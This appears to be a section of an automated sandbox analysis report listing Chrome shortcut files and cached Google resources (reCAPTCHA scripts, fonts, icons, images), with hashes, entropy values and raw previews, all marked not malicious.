SHA-512:	4A4E27D38C3E581A4F307538FB4DFE3F7DAE17C670E9CFDE52F6A388DE30FA215F9465053392EBDD3C8B80C92BED8A3B7FAB62E65C11247DC7FAFF8492AD90E1
Malicious:	false
Preview:	L..................F.@.. ...$+.,......}..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0020755568155275
Encrypted:	false
SSDEEP:	48:8xQdrTz3sHQZidAKZdA14tseh7sFiZUkmgqeh7sAy+BX:8x0/JnWy
MD5:	BB2D4B8FF8A7D169DE36BA7CF5A6DE9C
SHA1:	BA1E79130FCD8D08DB849907185CCD1B9E4440E3
SHA-256:	DB6EEAFA1FA81F7E66D583472F82A587B8583E81D3F2BB544287EDA73FB8E287
SHA-512:	FE79F8CFF3F3C14ECEF20474BC9A4A8E93523811BA390CB402C1AE48C43843D5D3D12F3B01B4F369183638ECC8D8C82E9112A6D2A152D279AC66446A9796B96E
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9897190823500814
Encrypted:	false
SSDEEP:	48:8bvdrTz36EHQZidAKZdA1vehDiZUkwqehOy+R:8bh/6SYy
MD5:	30C6E8E0438BC76C6E85486FCEC90824
SHA1:	090A0B3632D7A91FC6DB8FA71CCD13C26AFFD6BC
SHA-256:	3327B8469284976A3934B66A33AEF5BC2E84109FCAA671CC368CC4AAC9B2CE46
SHA-512:	73A7F96EABC97B588A7103610B6EA268B0AE98834952821CCD59675880E463E291A0C695CC99CAD13273E0C30B11E1E1D81F30E845B7677E77B9C71CAD8A6CFB
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....uw..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9776965076959248
Encrypted:	false
SSDEEP:	48:8XdrTz36EHQZidAKZdA1hehBiZUk1W1qeh8y+C:8Z/6i9cy
MD5:	E39D080150C07894C474D636A861C22D
SHA1:	149E1A5CFF67437576BF01554B2885B916DADD3F
SHA-256:	D3565D9F2878EF9827F5A7D96F3F2AA02DDDC166DB13571BFFAF19B7126C5B01
SHA-512:	A4432BD78CA3B3196BF2CE0619FADFBE267089DF8C7C09AF2A10D07DECB17648D85CB12570FE509286493190A18DBD59F963029F3EF12DEFE85C40C2CEA63CC5
Malicious:	false
Preview:	L..................F.@.. ...$+.,....n....d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.988222124042782
Encrypted:	false
SSDEEP:	48:8VdrTz36EHQZidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbWy+yT+:8j/6cT/TbxWOvTbWy7T
MD5:	BF9668F1E451E380D6A7CC6D06C38298
SHA1:	963F6EB2034441E3130EFE7D03E951A10B588733
SHA-256:	D6E3F61B8877EF91B735B01352C4703471374E936D97CD6344723C4E9367759B
SHA-512:	3C0087769A0A03C9617C027595F21612C7B02586A7322AC019DCC72D4C872CEE0EF4110615836853778A49D028D9A1A32E3CDF3D840C3C0E05E43B4C3EAB6B11
Malicious:	false
Preview:	L..................F.@.. ...$+.,....~.n..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 100

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (56398), with no line terminators
Category:	downloaded
Size (bytes):	56398
Entropy (8bit):	5.907604034780877
Encrypted:	false
SSDEEP:	768:+LUmmAWTe2uXYp8Mi+yKYlebyB5lxRx54PHSGdXXwW7MFWwXVuE2:4UcW6v+0B5chXwW49z2
MD5:	EB4BC511F79F7A1573B45F5775B3A99B
SHA1:	D910FB51AD7316AA54F055079374574698E74B35
SHA-256:	7859A62E04B0ACB06516EB12454DE6673883ECFAEAED6C254659BCA7CD59C050
SHA-512:	EC9BDF1C91B6262B183FD23F640EAC22016D1F42DB631380676ED34B962E01BADDA91F9CBDFA189B42FE3182A992F1B95A7353AF41E41B2D6E1DAB17E87637A0
Malicious:	false
URL:	https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css
Preview:	.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAAACXZwQWcAAABUAAADSAC4K4y8AAA4oElEQVR42u2dCZRV1ZX3q5iE4IQIiKQQCKBt0JLEIUZwCCk7pBNFiRMajZrIl9aOLZ8sY4CWdkDbT2McooaAEmNixFhpaYE2dCiLScWiQHCgoGQoGQuhGArKKl7V+c5/n33fO/V4w733nVuheXuv9V/rrnvP2Xud3zvTPee+ewsKxMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExP4OdtlT6ztAbRWvvLy8A3QkwxzH6tBGMMexI

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	102
Entropy (8bit):	4.989054234716049
Encrypted:	false
SSDEEP:	3:JSbMqSL1cdXWKQK43xrcphyAeWaee:PLKdXNQKqAeL
MD5:	1167D6356DB396071EE04367695481DB
SHA1:	BAAC3F93333B125BDAAE6945D12501BD2331699D
SHA-256:	7D4765F9E5EF9C44C30128CF2055EA61529F0C9FDF121B4DDCA394DA954D82DF
SHA-512:	A601002BBFD89C96CDFB1B3D4CDC01586953E19E497BDE8C11B186F92052FD7373CBCA794109F64F944EE079CE99F15DA607BBE5B9A3243C5D14A97D1C1E86CA
Malicious:	false
URL:	https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA
Preview:	importScripts('https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js');

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
Category:	downloaded
Size (bytes):	15344
Entropy (8bit):	7.984625225844861
Encrypted:	false
SSDEEP:	384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
MD5:	5D4AEB4E5F5EF754E307D7FFAEF688BD
SHA1:	06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
SHA-256:	3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
SHA-512:	7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
Malicious:	false
URL:	https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h\|.l....A....b6........(......@e.]...:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P\|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].\|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)\|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed..'..qP....M..j....../.z&.=...q<....-..?.A.%..K..

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (733)
Category:	downloaded
Size (bytes):	499483
Entropy (8bit):	5.689959239730183
Encrypted:	false
SSDEEP:	6144:NvawYKfp4y5Wivn2HgBwIwhl998Ep6rihru6tbOq8hSlmYNuxF:tawL4y5lGn/8Ep4/UOLhobc
MD5:	C37774BE5504A3A7DEF09EFF73263BC3
SHA1:	C5160A2908B3FD4230ED5CF521728FABAF3B5C06
SHA-256:	4FD66999FB60AD3289DFAEE132FF52C0B1ECBA71661E4CBFE47D09AC4F1CD5A1
SHA-512:	0B6BD8B8BA94B177597517B641FADE09F843F22C3F02D9B1BA6440A19ACACAA598AECA3C2315D106D560E78837E1E9FA74111856D52F40CA9A7865D4F4EEC9C3
Malicious:	false
URL:	https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js
Preview:	(function(){/.. SPDX-License-Identifier: Apache-2.0././.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT./.var l=function(){return[function(N,C,H,p,U,E,y,z,c,h){if((N\|(c=["call",36,14],56))==N)Z[c[0]](this,C);if(3==(((N&((N&c[2])==N&&(p?(E=l[29](77,p,H),null===E\|\|void 0===E?U=C:U=new pU(E,ES),h=U):h=C),73))==N&&(p=A[4](24,C,yp,H),U=void 0,U=void 0===U?0:U,h=A[c[1]](12,C,f[4](19,v[20](33,H,p)),U)),4==(N>>2&15))&&(h=H.replace(/<\//g,C).replace(/\]\]>/g,"]]\\>")),(N^32)&15))if(E=A[4](7),U=void 0===p?0:p,H){for(z=C;z<H.length;z++)y=E[c[0]](H,z),U=(U<<5)-U+y,U&=U;h=U}else h=U;return h},function(N,C,H,p,U,E,.y,z,c,h,K,e,u){if(!((N^34)>>((17<=(N<<((N\|72)==(e=["Tc",'" style="display:none" tabindex="0">',29],N)&&(U=W[e[2]](55,this),C=f[4](25,this),H

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.75
Encrypted:	false
SSDEEP:	3:H0hCkY:UUkY
MD5:	AFB69DF47958EB78B4E941270772BD6A
SHA1:	D9FE9A625E906FF25C1F165E7872B1D9C731E78E
SHA-256:	874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
SHA-512:	FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAk8dqZYMe7mkRIFDVNaR8U=?alt=proto
Preview:	CgkKBw1TWkfFGgA=

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	5430
Entropy (8bit):	3.6534652184263736
Encrypted:	false
SSDEEP:	48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
MD5:	F3418A443E7D841097C714D69EC4BCB8
SHA1:	49263695F6B0CDD72F45CF1B775E660FDC36C606
SHA-256:	6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
SHA-512:	82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
Malicious:	false
URL:	https://www.google.com/favicon.ico
Preview:	............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (17265), with no line terminators
Category:	downloaded
Size (bytes):	17265
Entropy (8bit):	5.6124843571072995
Encrypted:	false
SSDEEP:	384:ENmDG2zKGE2+YnVQ7gKMIwu5VIc9g4a/rEJjpWn8Cw:5JzpE2EpMIV/K4WE9Gw
MD5:	5B536CDBB5025EE82FE0782ECB4568C6
SHA1:	23350D4CA27A454209C870288D91008AB5782B1B
SHA-256:	CF2BC8471CA9269F57B173FB6C5AD405DF0963FCC24AEDB26BE6E495D94C4E4F
SHA-512:	418FE0EF4557DBFD56F176270D35E94CB1161690F0592D52A944501D1A48D1867DC25AD0DECF841FE9F3D8C4538447D982F24EDD5A0018A64DF724BB18643B92
Malicious:	false
URL:	https://www.google.com/js/bg/zyvIRxypJp9XsXP7bFrUBd8JY_zCSu2ya-bkldlMTk8.js
Preview:	/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t / (function(){var B=function(d){return d},X=this\|\|self,J=function(d,z){if(z=(d=X.trustedTypes,null),!d\|\|!d.createPolicy)return z;try{z=d.createPolicy("bg",{createHTML:B,createScript:B,createScriptURL:B})}catch(I){X.console&&X.console.error(I.message)}return z};(0,eval)(function(d,z){return(z=J())&&1===d.eval(z.createScript("1"))?function(I){return z.createScript(I)}:function(I){return""+I}}(X)(Array(7824Math.random()\|0).join("\n")+'(function(){var zN=function(d,z,X,I,V,a){for(V=(I=(X=(z=m((a=d[da]\|\|{},d)),a.wk=m(d),a.N=[],d.T==d?(b(d)\|0)-1:1),m(d)),0);V<X;V++)a.N.push(m(d));for(a.Je=f(d,z),a.es=f(d,I);X--;)a.N[X]=f(d,a.N[X]);return a},BO=function(d,z,X){return((X=Z[d.l](d.he),X)[d.l]=function(){return z},X).concat=function(I){z=I},X},iD=function(d,z,X){if("object"==(X=typeof d,X))if(d){if(d instanceof Array)return"array";if(d instanceof Object)return X;if("[object Window]"==(z=Object.prototype.toSt

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	5430
Entropy (8bit):	3.6534652184263736
Encrypted:	false
SSDEEP:	48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
MD5:	F3418A443E7D841097C714D69EC4BCB8
SHA1:	49263695F6B0CDD72F45CF1B775E660FDC36C606
SHA-256:	6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
SHA-512:	82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
Malicious:	false
Preview:	............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1222), with no line terminators
Category:	downloaded
Size (bytes):	1222
Entropy (8bit):	5.834072124457519
Encrypted:	false
SSDEEP:	24:2jkm94/zKPccAv+KVCLTLv138EgFB5vtTGJTlWtqn1/I8AsLqo40RWUnYN:VKEctKonR3evtTA8En1/3BLrwUnG
MD5:	4AC49175C314DF12EC34B4146B36237C
SHA1:	308CBE54E95BF0A3B42C122CA66A720C558B4DAF
SHA-256:	0CA481C23EC930C9DBC8259D22182E5F93730186A236BAA8D6A3DD2CC7A41DA6
SHA-512:	9C44831DD3D04F773628D7FDD559B58C74EDCDFC32AB5FEA326494A58910017DA1C55FC526AE6A41AD20EBF7FDF05DA634759FE2F212B3C49AAD004337931C95
Malicious:	false
URL:	https://www.google.com/recaptcha/api.js
Preview:	/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']\|\|[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-7+IRLxkl1z6qr/oVEzkUcOT7nJWJEREgLpBaZWNu

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
URL:	https://www.gstatic.com/recaptcha/api2/logo_48.png
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
